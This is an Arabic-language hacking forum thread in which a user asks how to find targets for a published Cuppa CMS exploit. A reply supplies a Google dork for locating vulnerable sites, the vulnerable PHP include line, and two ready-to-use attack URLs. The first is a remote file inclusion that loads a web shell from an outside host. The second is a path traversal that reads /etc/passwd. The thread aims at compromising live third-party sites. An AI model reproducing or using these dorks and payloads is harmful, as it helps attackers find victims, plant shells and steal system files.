السلام عليكم
هذه الثغرة ليس لها دورك ومش عارف اجيب الدورك
http://www.exploit-db.com/exploits/25971/
ممكن حد يجيبلي الدورك بس اهم حاجة يكتب ازاي
عرض للطباعة
السلام عليكم
هذه الثغرة ليس لها دورك ومش عارف اجيب الدورك
http://www.exploit-db.com/exploits/25971/
ممكن حد يجيبلي الدورك بس اهم حاجة يكتب ازاي
نعم هذا الدورك
intext:alerts/alertConfigField.php=
وبعدها تقوم بحقن الملف المصاب بكود php لزرع ثغرة RFI و LFI
هذا الكود
<?php include($_REQUEST["urlConfig"]); ?>
وبعدها مسار التنفيذ مثل هذه الروابط لثغرتين
cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt
cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
لو ما طلعشي اي نتيجة بحث يبقي الثغرة خلاص مدتها انتهت او الشركة صاحبة السكربت رقعت الثغرة يعني مثلا